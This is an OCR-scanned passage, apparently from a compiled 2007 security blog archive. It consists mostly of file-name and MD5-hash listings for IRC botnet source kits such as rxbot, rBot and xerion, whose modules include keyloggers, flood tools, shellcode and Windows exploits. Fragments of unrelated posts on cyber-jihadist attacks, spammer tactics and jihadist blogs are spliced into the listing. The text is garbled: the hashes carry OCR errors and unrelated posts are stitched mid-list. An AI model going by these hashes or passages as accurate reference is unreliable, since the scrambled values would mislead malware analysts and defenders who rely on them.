4b918d1a9d6f7123b96de54ee1295ba2 
fphost.h e742aa255d016fabcf05e910671029Ff2 
ftptransfer.cpp 
3ab98246757a374780136ffc618d4afa 
ftptransfer.h 
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4c7bca4793b62c5alef45bf15d501815 
functions.h 
512bdf3aa8539e6586b673651779c096 
global.h 3755356ffe76d8e33b47c447c6a18949 
globals.h 
9eaa26cd252e3c6d3666ff69166c5c75 
httpd.cpp 
8583c5bdc5fcf15e8a09d4c743bba937 
httpd.h 
40acee6b9e87d9fdalc344d6801e4d82 
icmpflood.cpp 
d9bbab91555fd0b3113171b9bce3e51d 
icmpflood.h 
69c28eb4594a951491fa9fel0cfd7023 
ident.cpp 
69f7f7fc4857317ff4cf022b3c623efc 
ident.h 
2905285b73f0a646edf865941d042388 
includes.h 
c84df88272e7b0992b55f110ab668e96 
irc send.cpp 
74cddd946667027a6ece2abf23d63726 
irc _send.h 
5cd05d1f4498f0dee2f76aa70816bfca 
keylogger.cpp 
8c02847939657657f7936c8822bbe618 
keylogger.h 
02b12b62dca1052e6aacfeb6f9463cb4d 
loaddlls.cpp 
192b366a01bc973b650c2bf40d5347a0 
loaddlls.h 
de234c6360070e37ba920ff803fe5cbd 
Isarestrict.cpp 
6604947f51438d50dd3179e4d32513c4 
Isarestrict.h 
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ladeeni.net 
meca-love4all.com 


The attached table is the classificaton of the attacks, as site to be attacked, reason for 
the attack, importance, the results, and the site’s status after tha attack, namely is it up and 
running or shut down completely, and how shutting it down would please God. 


There’s a saying that a person is judged by the type of enemies he has. If we apply it 
in this situation, you would see a bunch of inspired wannabe cyber jihadists whose biggest 
enemy is their idiocity at the first place. So, if these are the cyber jihadist enemies of yours - 
lucky you, and your critical infrastructure’s integrity. 


1. http: //ddanchev. blogspot .com/2007/11/electronic-—jihad-v30-what-cyber-jihad.htm 


2. http: //ddanchev. blogspot .com/2007/08/cyber- jihadist-dos-tool. html 


3.11.16 Popular Spammers Strategies and Tactics (2007-11-14 18:54) 
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842 6fcb5fa1l139bd071d92a2ae3e87e6 
Isass.cpp 
ead979e26b200bc069cbaadf6a9e7c5f 
Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 
misc.cpp 491d8bab443d1c5b9317cc477c45eb6d 
misc.h 
1d2b9e0f4a60657930e8017ef3387b47 
net.cpp 
2d32eca652bdef13ed88f418811ca03e 
net.h 
73a17ab3e7e0e85758baef46bbb6fbd9 
netbios.cpp 
0442a99c7f5e94d367f7a01b4d181leea 
netbios.h 
21187a1c2946b39031b1455e203c719d 
netutils.cpp 
5ef77b205140b6cd6217ecf96F4649f6 
netutils.h 
961a680f39cdfdc9404c7a7fdc47fe41 
New.txt 
2af83adf2ebae61c8c2140a3764d6bb1 
nicklist.h 
774ccO5ca6fa366ba4cd62aa487a43fd 
passwd.h 0c85f5c813fald608dca7579fda3b692 
peer2peer.cpp 
7fa712db3241c69112b7a853516ff0f5 
peer2peer.h 
920cce5177elfcaacdf28ec4aalc18b1 
pingudp.cpp 
219c6afda6753754a262039d531d7612 
pingudp.h 
60dd9b6dbe85e2980bd44c78b94af244 
processes.cpp 
00d012bb9d7elabb58272d3bcac1d558 
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processes.h 
78ecb9691e2b5c71leaef61a49a81c5f6 
protocol.cpp 
6b19cb3de401621245718c22a83f0f00 
protocol.h 
a0b7f083b164146574f188aelbal37bd 
psniff.cpp 
ce3658d84c207d7de85c40660be41609 
psniff.h 047c56a24e81255c2798f7a5ce2697c5 
redirect.cpp 
3c82b4e1343e095c97aafd1b09b955a0 
redirect.h 
f9f777705cfebe603a4d343b45c37f8a 
remotecmd.cpp 
fc9e1c9dc6d9bad25161c75d5485cdle 
remotecmd.h 
34f3dd0f8086835d75856953b4585184 
rlogind.cpp 
8c3b7b89bb5c95021670279e3d38d09F 
rlogind.h 
cb08b43b66f9373bf5f5d10207e8506d 
rndnick.cpp 
bc7f77dcecO0ac80e762eec539abb2b22 
rndnick.h 
a039897513f6c7f14ae2c055a8613e15 
rxbot.cpp 
8d761edc718da9aalca53d75301498bf 
rxbot.dsp 
Of675fdf5714a0fe4fb4fefa7ab64d0c8 
rxbot.dsw 
fc487c3a795382f36d55542914a408bf 
rxbot.h 
88f0d0385dd0cf68e312b58e7b073985 
rxbot.ncb 
e34d18e42b5e5f38fd50b4e4eal5b6dc 
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rxbot.opt 
dfb686155c1404d21a51b36fe7f5b865 
rxbot.plg 
42ef16aea05783bf67d7528a0eca99a2 
rxbot.sIn 
3ebf58176fc679e7b907f3390d04ccd7 
rxbot.suo 
5ddfa906c2c263945642f14828a3da25 
rxbot.vcproj 
a0d07d0bfeb50ef58ca4009ff9556374 
secure.cpp 
96f49e55c861ce5690bf15bf8177e68e 
secure.h d93a2e11964c64256d58caa4d866c23a 
session.cpp 
869f5a77c9051af9bb7649af69b8c708 
session.h 
43bd01576a5e108ecd6be688df7ac7a5 
shellcode.cpp 
a775a52b80cd3195d60eab255cd83eff 
shellcode.h 
f729b669cc481de667c62da44d82db24 
socks4.cpp 
27c415fc0f988219fd849639255b11f3 
socks4.h afca5a7dc5e00e4c0175bd1995a9f308 
startup.cpp 
d3cc3d6f85dfb6e602a3e3b42eedb853 
startup.h 
d612518972d7217f572c458ce7001a/7f 
synflood.cpp 
1493a3132639dc9a2bef54962cd537f6 
synflood.h 
8f5c957ecc0e30ad8a353bff7c348136 
sysinfo.cpp 
5f2c3f6cd2591122adefc66234600884 


sysinfo.h 
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889ff95200e143154622dfa03bbd1499 
tcpflood.cpp 
d6fc90557c34d9141e2ac828a0a00955 
tcpflood.h 
823cfc5b863fe159048b7fdf93clae2f 

tcpip.h 

2efcde7c48f649029add415c7947632e 
tftpd.cpp 
7747a86326615ae13d3a47bfba2acb65 

tftpd.h 

d8792fb79874ff55eef1668748e9fdcf 
threads.cpp 
743999d05f618cc9577ee8d2a5769e70 
threads.h 
6a9eed28bd1a8b17a18e24932cdd3fle 
visit.cpp 

7911a3fac89cdfb266d2d3028f1347f1 

visit. 

cc3c8464e7c05d952bdfe2aa3f0e07db 
wildcard.cpp 
5363b51b1fa352074748f9d172d993b1 
wildcard.h 
825326cb947d6c374ab8501f372c0272 
workstation.cpp 
3be726c7f2e4404b198ff5f7042318c7 
workstation.h 
d16ef3f05e153e67803fba8d67532dal 

rBot.dsp c95efa3d03e5271152652022915e2ec9 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.ncb eeec2bfccee284825f493f628cbce0bf 
rBot.opt e83b2b260fc94bbc4b383100dabal7c3 
rBot.plg 3490f56001d133ce1b323107e6c7938c 
Changes.txt 
ad8b3d84ca6a908c2615da4a68438168 
advscan.h 
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f3492751a194b23b17bf6529112a16b7 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
configs.h 
657e29fb205039084ccb74f30a82d703 
crc32.h 
lcd0adeb14bdd0dcbc3fe66a5fe2fed9 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
97ada46ed84b285cacc5fl1lc7ee206de 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
6736f17c2ale2ad02869928e3b15783c 


fphost.h 7269b3d4234fcbc5da07695ae3483c1b 


ftpd.h 
48a891506c957340b207b627105d7bb4 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 


includes.h 
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823e580f49a4d8eadafab6197dda9123 

irc _send.h 

30d0176a5e9b6e3e5al 9bfb1fcda444c 
loaddils.h 
4703f87679db3655151348076c41a83a 
misc.h 

f035c1642a8e3ff49ff19bb1be316333 
ms05039-pnp.h 
c1676a1f6e2770c9c993ae2e13161c0b 
ms05039-win2k.h 
da47a260b3a9a377974f36232b471779 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
ntpass.h 6cal6c9c9284cc07346a31bd6e07fea2 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 

rBot.h 

6d17278915220464f9502b8ce5451f67 
redirect.h 
9e5349d6d6944a179b9ca7a7d847c335 
remotecmd.h 
1fb45492f87a66e34be6b4ca55b1cf86 
rndnick.h 
3cbe632d4ca6f152ca2a13bb1561d292 

scan.h 

6236be771c0c88df937f75845a064f12 
secure.h 231le3dd2ba09a8bbc039caf634e5306d 
skysyn.h c7d7710b27cce85f8bdea408945b238c 
socks4.h b103f307ffO2cd98fe2bfbecbd19c011 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
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sysinfo.h 
38774eadb5ba365df293ba4a222c4163 
tcpflood.h 
a9165cc828d623c51c297ec888803d9f 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.h 
01a889b931f69e44f3a9421e16c327bc 
threads.h 
f16de170fe23839ccf32154d464ea5ff 
visit. 
766e4add98e2cb96bd37e87f4d9dfff9 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
advscan.cpp 
e1205efa8ce40147d7a0e79dde225563 
aliaslog.cpp 
5ab7456a9dc3ff9c5c1l02eebfe5c1c05 
autostart.cpp 
9d6b9e0b182f0770c7e53371e209bd83 
crc32.cpp 
Ob6f74c90e143c321f7350eb5cec00d1 
ddos.cpp 993eb0cefc83ec54eb881af88988e0a6 
download.cpp 
14f6fac91f34a06b3181d68bd2a65718 
driveinfo.cpp 
2ba31leb7fcbd70c9848a86055c78a8df 
ehandler.cpp 
094d4e146ab0fd585b4215221ef7eb7d 
fphost.cpp 
e8a9f28bf65b1e2c9a97a44f0929e55a 
ftpd.cpp 548726d40c735a189cc9fc28ab02c753 
icmpflood.cpp 
f97c9760b17051eec8d912681c3f1841 
ident.cpp 
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86f86f38b612931496b9c320288cef64 
irc send.cpp 
9672d756206d9a7f491d818645d4aca3 
loaddlls.cpp 
bc5436bdf839eaf41a387f82b6cbbdb6a 
misc.cpp 479509e6c75a9831b0237136f2d4dfce 
ms05039-pnp.cpp 
34796289e62d55ae5ad80d86186a6fde 
ms05039-win2k.cpp 
cObdce1d9a6a4c5bc7b6e195331ac82b 
netutils.cpp 
21f345418cbd8c1le2f79ce5915f7d2cb 
pingudp.cpp 
c2f52ef92337c6dbb652f1b176592138 
processes.cpp 
7f58d346f96db45112231ee3040cb6c8 
rBot.cpp ad4cc7015a7f245c2c82616e95110cb8 
remotecmd.cpp 
bde3aa20cd9ab59d9d684207ed5a56ef 
rndnick.cpp 
41f9f470575c14c4a3289c2872e49e6c 
skysyn.cpp 
7cee67a8959acd9d020ca453800a1797 
synflood.cpp 
6a46fa9654dc5108415deb9910957f2c 
sysinfo.cpp 
64e3789e0f9163114c0f7fe02f308e48 
tcpflood.cpp 
31fc35ce4a71253720df9275092e2bc0 
threads.cpp 
Ob0eb3afa0b104448d363c1467d1cc34 
visit.cpp 
laea6eb6abe55ca3707c66774a49f25d 
wildcard.cpp 
83da79ca158b8aad9844d0c08ce2f71b 
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advscan.cpp 
da56aefbc55e38e661850597019494de 
advscan.h 
5ed5cdbfe64622133e275437db155090 
aliaslog.cpp 
8b113baeddeeab4c593e5e9e8al30c5c 
aliaslog.h 
5b5d906f5f0019fe4d7ce493c28b3802 
autostart.cpp 
306dd702bbb1613d95cObb1d8c95ae92 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
beagle.cpp 
45ca74ec0aa5d493533ea48bccc7f890 
beagle.h 76fa5d92efdffaadb93a416dc5ffbaf8 
capture.cpp 
cc02f54ee6f64796c472347d235dc8Ff1 
capture.h 
e0df649d44906ef5e460ac9d3afe9039 
cdkeys.cpp 
0362f8d1ccb9b0df9476e4b48704b226 
cdkeys.h c516c3168da496b203a4e71a7d72656e 
changes.txt 
2c173c98ef2c11e8b1e969b538b20ac3 
configs.h 
d99ddce2a13e427664d36993f2af6931 
crc32.cpp 
4fa7e51e08884c68713a7a844128df82 
crc32.h 
Icd0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
d1b2009632326a355949332e77541fd5 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 


dameware.cpp 
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€14583f23776c7fd1383bfe934c4d6b2 
dameware.h 
c5f45e22e790da8dd52d90dd4841b5c7 
dcc.cpp 
51dba8236828b379b65bd3bedde830ad 
dcc.h 
85292f79b21e5f5a9aed9770804b0e19 
dcom.cpp c9e94f91512de5e60d5135dlacca856b 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
7c1fa9e124ca0629795c13b68c82f25b 
dcom2.h 
baf9d3b315b1d84ad96ea9d89999753e 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
€48a61024b2a3c991f7a4faela0a2d38 
download.cpp 
7a616d2936cd85c1c719014a3el1d9dff 
download.h 
6dd6bd9b4f982ee5443772ca775albOf 
driveinfo.cpp 
Oe3b5f5ec21ba5a03e0dde9f2523881b 
driveinfo.h 
d139b6d77a4a3b3d41928cfa90613d01 
externs.h 
3321901281d509ad6944dd447da8c279 
findfile.cpp 
8cd91e7db6bedb502705726f2bb277da 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
flood.cpp 
8ebc641037c3087339faa4fe429b424f 
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having a spam-free inbox. What strategies do spammers use in order to achieve this? What 
tactics do they use in order to obtain email addresses, verify their validity, ensure they reach 
the highest number of receipts as possible in the shortest time span achievable, while making 
sure their soam campaigns remain virtually impossible to shut down?" 


The article covers strategies and tactics such as : Redirectors/doorway pages; Rapid tac- 
tical warfare; Verification/confirmation of delivery; Consolidation; Outsourcing; and Affiliation 
based models. 


1. http://windowsecurity.com 


2. http://windowsecurity.com/articles/Popular-Spammers-Strategies-Tactics.htm 


3.11.17 Cyber Jihadist Blogs Switching Locations Again (2007-11-15 21:05) 
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flood.h 
4607d7eff8b5f60d4ee6af39f8cfce04 
fphost.cpp 
48c440982ab6b320da0181cbf94a6671 
fphost.h 7269b3d4234fcbc5da07695ae3483cl1b 
functions.h 
7ac3cf2df935e44ea60e3d7845e234a4 
globals.h 
15370dbb17c160b8cbddbf0d85a0f8d5 
httpd.cpp 
7e7a8677cf8298d1597cf8397f51773¢c 
httpd.h 
9aalbc9e308406bf716814edcd68b509 
ident.cpp 
07ef48d935ec546da68d6c2d43d4e6f0 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
e8aafc607241eeca0bc984c7db98a56c 
irc send.cpp 
4d1dc011e75008e0686adfef2b4ce60a 
irc send.h 
deb80fe9faf3ad07e4abfla6df76102c 
keylogger.cpp 
€569621c990b37affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
kuang2.cpp 
ce5f0f4d470b760d2276fab309878420 
kuang2.h fc3343ecc92dba61f83260bbb93aa70c 
list.txt a6875f7883fd3248ca96e89e0350c3ec 
loaddlls.cpp 
eecObfbf5b8c264600b58011645cacd8 
loaddlls.h 
10912fb54b7c7903f3a908a64b1ac37a 
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Isass without batfile.cpp 
23504492eee0cbd9d6c8e5a30609b7a2 
Isass.cpp 
2b256036842827b53d931b3c7edc5b52 
Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 
misc.cpp £725317a7c909bdf939e42c47e55af67 
misc.h 
2c8041be9a426b1478882a3958a7f78a 
mssql.cpp 
7943d2d1e76ed8c6769cc0ec14c3fa6c 
mssql.h 
742394ed531laab2ecc958daf5305723e 
mydoom.cpp 
a0c5e7d062ebbf611c5818ea8c176f50 
mydoom.h 1e0f4d2715a8bdd200e5c56d5c625fb1 
myshellcode.asm 
ce26d85257d8fa2c68a5ad6012ed010c 
net.cpp 
dcbc001a93acb4albbdb293f2ff68575 
net.h 
d31221b4e1e02ab884bc86c135a8ala2 
netbios.cpp 
242f5b10f3baf2fef745e53d38022e05 
netbios.h 
a239bd672842a4b3baal66de90ec53e0 
netdevil.cpp 
2d66e0df67f4388e3764ef4698c00Ff17 
netdevil.h 
a89982a588e965ce01448c60a81585b3 
netutils.cpp 
70b40e4861703f1482658d9c93fadd8e 
netutils.h 
alc9f03b3643cb4fa07cd9ab4e8f6609 
ntpass.cpp 
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116316adcda1803310d08fcOf02b6af9 

ntpass.h c042b743f9138a808368d1a849d87cf8 
optix.cpp 

af712af62fe9331e42205fca8f911373 

optix.h 

3001e7bce448e97fb0c36d17d8d3bb72 
passwd.h 02ea53dd9d277e5c30d40f4e8d1b622e 
pingudp.cpp 
deb2ca9a2d5d0a886f3b5a57a520d31b 
pingudp.h 
6c584d98d0f1f0cc87039c32556009f5 
processes.cpp 
c6e71ff6e02efeaf419aeal8ab6dee842 
processes.h 
€6610dd1b2287db779396c2a1125d0a4 
psniff.cpp 
€043db547ea8d03bdb321456b3237bdd 
psniff.h Oea96cb2476fe3e5b65c490d8a042da2 
rBot.cpp Oe666cce8eb834fa8c28fd1df857fe2a 
rBot.dsp 9af6140268c5c9239ed611764c0edb94 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 

460d5cc6152a947015869658510b5b5e 
rBot.ncb 5edOfbfeff5fc1b248ad054eb1370acf 
rBot.opt 1f6ab8f0fbeae2391f264e588a7ceae7 
rBot.plg f3c8f58e8012131ecceb985509d53da2 
redirect.cpp 
065bab43fe7e2cee32a608c0e1359498 
redirect.h 
e50dabdc477b3d4b943b0e0b1865e739 
remotecmd.cpp 
6bb024af9fa0eac0e9b258c1d9563af9 
remotecmd.h 
a2f97d6c8d45cbcc090a5c2e3403d9e4 


rndnick.cpp 
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fedc5cf0b0949c8825fa335443664571 
rndnick.h 
7a25f4fa942faab1bb2308cb1559f472 
scan.cpp 4a4ac4fa240702cb90ec1dcc3cec8fac 
scan.h 

3d1f51c52cb0aead9a2899eb96ae8cd6 
secure.cpp 
40419ff85af8079e7b99376761lacea85 
secure.h dba2b38530b058423f91883de579e459 
shellcode.cpp 
700e4ead9214cd2288cc879a3311a518 
shellcode.h 
cal4f267b73bc867b075ca56f524d52e 
socks4.cpp 
1c47f1b0db7b82ea47f27e8d96e7447a 
socks4.h 603ded79fbce28cc17da923839c93438 
sub7.cpp e3661739128b71d8b6b044bf30cec920 
sub7.h 

c60800f9fecb35bb27384594b46feb22 
synflood.cpp 
3384fadbafbed4ae6fa7dd003dd49b44 
synflood.h 
37d28b14d17e97ae0b1a674c9a2808d3 
sysinfo.cpp 
2972142d5c2881ac5d87b91a6ca7823d 
sysinfo.h 

fe9ff90487836b10a0f0ff3332558d3f 
tcpflood.cpp 
dd12816e442003152d2f65d42ce7eeb8 
tcpflood.h 
a9165cc828d623c51c297ec888803d9F 

tcpip.h 

d34a55bef016a45671781d8c6040c502 
tftpd.cpp 
4a0762987b27a8fd946431a160ab583e 
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tftpd.h 

1f0c9b684e0050cd04f4bb62a424bddd 
threads.cpp 
af54d34aacd72ef0f4f059374731beb1 

threads.h 
ac7ffc0341056ea22da287374a77406a 
upnp.cpp 0b10a587e353e06c7ab81f6f74861086 
upnp.h 

6be3f6b1cfecla51673271021f67cab6 

visit.cpp 
508c60dd5a86011351a2079c9271cadc 

visit. 

4b1a61d58dac2376c0f51253be5746c6 
webdav.cpp 
3b0fb2d9a7499f1710ef4e7077858533 
webdav.h cblccbbb8ab3884e8e40ddb76a386bad 
wildcard.cpp 
8785f287656995d8621d455ac7e04ab7 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
workstation.cpp 
9de1e00419bba9d84a577336ee127a4e 
workstation.h 
d16ef3f05e153e67803fba8d67532dal 
kuang2.cpp 
fa21f1c42b07614558c2fc5e4d9c429a 

kuang2.h 61b43ebcd17e59fb21e0831d5ad50b22 
scanner.cpp 
aedfef4bd234a6df81cdeab327cf6718 
xerion.dsp 
767399234c7dbc2aa716fc32c3e57f64 
xerion.dsw 
810668862101004d76552d8add736fa6 
cmds.txt e2cd1a1877d1d21cde17fcde932047d6 
ExeStealth.exe 


11767 


399b61d6f67012f99e637ad24406d44c 
Packman.exe 
ea6594fbf21827e8a51d88df30b815b5 
Scramble-Tool.exe 
50d14bd0e330deal4fcf4b4d4e2d0bd0 
wup.exe 
52c6c8e6a0f210674a1e8b727a46c5a4 
yP.exe 
4adf4c22f9b41d74f898fe0cc872daed 
conf.h 
d4182b189bed64156336c9e588025a49 
advscan.cpp 
fa439fa932b3d9b10080b2727136a3d4 
aliaslog.cpp 
2b0ce2f949768c493d9711cdfa42158a 
autostart.cpp 
3d8107b637b64df3936b61a0f47 8affa 
avirus.cpp 
O0ced2ea373323849baf421d9288aae68 
bindshell.cpp 
e14cc4fc27c98ccefdfe6e96bed087d7 
capture.cpp 
34f9e5c4ab17aac9c226dc7e46a14379 
cdkeys.cpp 
75f3549e60df2452943ee03d675a7148 
clsass.cpp 
489bb51a098d59ef41fb9557ffc37106 
crc32.cpp 
dec6168cc6453e8fcdc7811b2df08c59 
crypt.cpp 
cce3c133ed66ach864e3feal9bd4b349 
dcass.cpp 
523f8b385b8858d60780933d86653ba9 
dcc.cpp 
363bb4da4dda0cae63cf51e789b9f2d4 
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dcom.cpp cl1fa5e1125d6b2497b68438c54adfcd1 
ddos.cpp 06d25cd6c46005aa738ff315ffb789dc 
download.cpp 
229ecc22eec010b3f965a4153ebeb0ad 
driveinfo.cpp 
a06368aa4099d5903ca5bc9d34312792 
ehandler.cpp 
99b778d38a8c6eaab6t5653c9ec8d24d7 
findfile.cpp 
560023c617d4032097d271554598d77f 
findpass.cpp 
cde1674a469a15c6ec85117a48a783df 
fphost.cpp 
2d4a8a6c4e80abb15970183d5dab5dcl 
ftpd.cpp 2afb4bd10992dc09a9103a2af4aee077 
httpd.cpp 
4be72321aa0f70e44ad7ceb9de23bffa 
icmpflood.cpp 
a78a0987f3b969c9224092f81155aa36 
ident.cpp 
6b9bb1cd3b2356ad3208547c10dfaa34 

irc send.cpp 
40c98c2846453ec6b03a4fee6332c556 
keylogger.cpp 
434238403743788c3b81677de44af084 
loaddlls.cpp 
f47bd083c11825f5857e7db4f576e0e2 
Isass.cpp 
fc551ff0e65382be10bb031a8c3fb81F 
Isassllsass.cpp 
fdd9cf3be5431978b666dec0740d1bcf 
misc.cpp c9be30497221d06bf04b2f939363bb2e 
mssqlI.cpp 
ddfccd81e006ef767f61bc019c92bd8f 


mssqllsass.cpp 
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a0406dcb05da5395613442120922d3b8 
ndcass.cpp 
efa34f7eb0ec43d085flaf445af8f424 
net.cpp 
a7ccf310133e1a3875fb37c41be2a9d8 
netbios.cpp 
f8e998cffbdd395cbf8d1lec10c125c9c 
netutils.cpp 
4ebf7c8f52fc405d72clef3cfdff3f80 
peer2peer.cpp 
49874c4968de9a00feb597c9fe56b028 
pingudp.cpp 
a302373f9a53eb658b8eeebfbb82fca4 
processes.cpp 
35acc849fe014b8c62fd21961b52adc2 
psniff.cpp 
6281dd26bdf26b41807b2633ddac4d19 
random.cpp 

24441 4bfe54b53af5c925209fb2f25e3 
realcast.cpp 
€29b65f294f373a0206573d488ea0805c 
redirect.cpp 
015f325e20b3f68ddb2ef365ac68cf4c 
remotecmd.cpp 
9620baaee43f4140afe6d42bd4b4d560 
rlogind.cpp 
8db22fe77e20555959f369442f9c90aa 
rndnick.cpp 
7daf256048b74456c8c0f310d435fe83 
scan.cpp Oeeed3b5248161bc813006b9c905030f 
secure.cpp 
398c32c3793356ff988309629087662c 
session.cpp 
03211de561465ebfbe76921778bfcd86 


shellcode.cpp 
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0a0e39abdb1084c6a5702912375949a7 
socks4.cpp 

755958d03d1c7ea9e9e7 3eadb0e7ec2b 
synflood.cpp 
aca5793822f6ffab7af2f623a709c6eb 
sysinfo.cpp 
d108c09c4be83143f3376461aa40806a 
tcpflood.cpp 
ba60cbef311c3549f24fdbe7d57ae82b 
tcpflood2.cpp 
c14f5d368dd059d902f361lec4af40c66 
tftpd.cpp 
1d6924d5f9228328036f672e5d927cb4 
threads.cpp 
leal58aeaf8c7c09c10944e59d6889cf 
visit.cpp 
893e5ff81da7b40fd703943b958bc03a 
wildcard.cpp 
Oaf5d4276abdc4ae3dc0b2c804f0fed1 
wksmass.cpp 
83e6f61b0eb1994d8934d546334a3dd3 
wkssvc.cpp 
663854e4ad06d547f2belfaca6581629 
xerion.cpp 
a0034b3a63f30ab80de542da97b07291 
advscan.h 
d5bfa343e80c04d15d6d7b5e9ce92eef 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
capture.h 
1a27e95a9451b7b9fde4dd31labbe40c4 


cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
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clsass.h 9dd1910cdd68b28ae76d47782d4f28d0 
crc32.h 
1cd0adeb14bddO0dcbc3fe66a5fe2fed9 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
dcass.h 
9465864b0a70a606815452cf5f4d31b2 
dcc.h 
€44c57141c37593156064072bd6570c2 
dcom.h 
08e05facd16c9cde8fdb6cabad82bae2b 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
5c89eabff803d8de611577fd173f7da3 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
6d54bd2234bc53abd246d36d77a38465 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
fphost.h 72b9b3d4234fcbc5da07695ae3483cl1b 
ftpd.h 
48a891506c957340b207b627105d7bb4 
ftppot.h 531455331daaac77b627652f4f469da5 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 


65ad95c53b660b0fc4bad98f2d2d4b22 
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Having had their blogs removed from Wordpress in a coordinated shutdown operation 
courtesy of the [1]wisdom of the anti cyber jihadist crowd, The [2]lgnored Puzzle Pieces of 
Knowledge and The [3]Caravan of Martyrs have switched location to these URLs - inshallahsha- 
heed.muslimpad.com; inshallahshaheed.acbox.com; caravanofmartyrs.muslimpad.com; ig- 
noredknowledge.blogspot.com. Apparently there’s an ongoing migration of cyber jihadist 
blogs from Wordpress to Muslimpads presumably with the idea to increase the time from a TOS 
abuse letter to shut down, if shut down ever occures given Muslimpad is significantly biased 
in removing such positioned as "[4]free speech" communities given it’s hosting provider 
is islamicnetwork.com. Should such propaganda be tolerated? This is where the different 
mandates of anti cyber jihadist organizations across the world contradict with each other. 
Some have a mandate to shut down such blogs and sites as soon as they come across such, 
others have a mandate to monitor and analyze these to keep in pace with emerging threats in 
the form of real-time intelligence, and in the near future other participants will have a mandate 
to [5]Jinfect such communities with malware ultimately [6]targeting the cyber jihadists behind 
them or the visitors themselves. 


The bottom line - the propaganda in the form of step-by-step video of an attack in ques- 
tion is a direct violation of their operational security (OPSEC) thereby providing the world’s 
intelligence community with raw data on their warfare tactics. The propaganda’s trade off is 
similar to that of the [7]Dark Cyber Jihadist Web, while you may want to reach as many future 
recruits and "converts" as possible, you increase the chance of an intelligence analyst coming 
across your community, compared to closing it down to sorted and trustworthy individuals 
and therefore limiting the number of potential future jihadists. Inshallahshaheed are however, 
going for mass marketing with full soeed, and in fact maintain a modest repository of videos 
at inshallahshaheed.vodpod.com. By the way, what’s the difference between wishful thinking 
and thought crime? It’s [8]a threat that proves there’s a positive ROI of your actions. 


Related posts : 

[9]GIMF Switching Blogs 

[10]GIMF Now Permanently Shut Down 
[11]GIMF - "We Will Remain" 


1. http: //ddanchev. blogspot .com/2007/10/wisdom-of-anti-cyber- jihadist-crowd.htm 
2. http: //ddanchev. blogspot .com/2007/08/analyses-of-cyber- jihadist-forums-and.htm 


ttp://ddanchev. blogspot .com/2007/06/list-of-terrorists-blogs.htm 
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httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
66c290286dlacbc8cec208fc55057dc6 
irc send.h 

30d0176a5e9b6e3e5al 9bfb1lfcda444c 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
loaddlls.h 
4703f87679db3655151348076c41a83a 
Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 
Isassllsass.h 
bf1f9228cd55caebad6e494feb333cd4 
Isass2.h 1b6c14239ecf58711345b215907fd83dc 
misc.h 
f035c1642a8e3ff49ff19bb1be316333 
mssqlI.h 
742394ed531laab2ecc958daf5305723e 
mssqllsass.h 
cd514407bfa73b71c3520a3a6eddc242 
ndcass.h 5eff9933855bcaalc936b7b691bdb912 
net.h 
b1bb95c11a47aa666acd9a5929861726 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 


passwd.h 50376b2e162dae58e42d17e19b473c42 
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peer2peer.h 
920cce5177elfcaacdf28ec4aal1c18b1 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 

psniff.h 5eebe93de4e03bf0bb118e35997743a9 
random.h 72101c961e86107d6d1d0e2b70fcelel 
realcast.h 
d7al14d60ffeab5efllde39ba64cce2e4 
redirect.h 
9e5349d6d6944a179b9ca7a7d847c335 
remotecmd.h 
1fb45492f87a66e34be6b4ca55b1cf86 

rlogind.h 
dbc479f2720ba03cb946419fbef774e0 
rndnick.h 
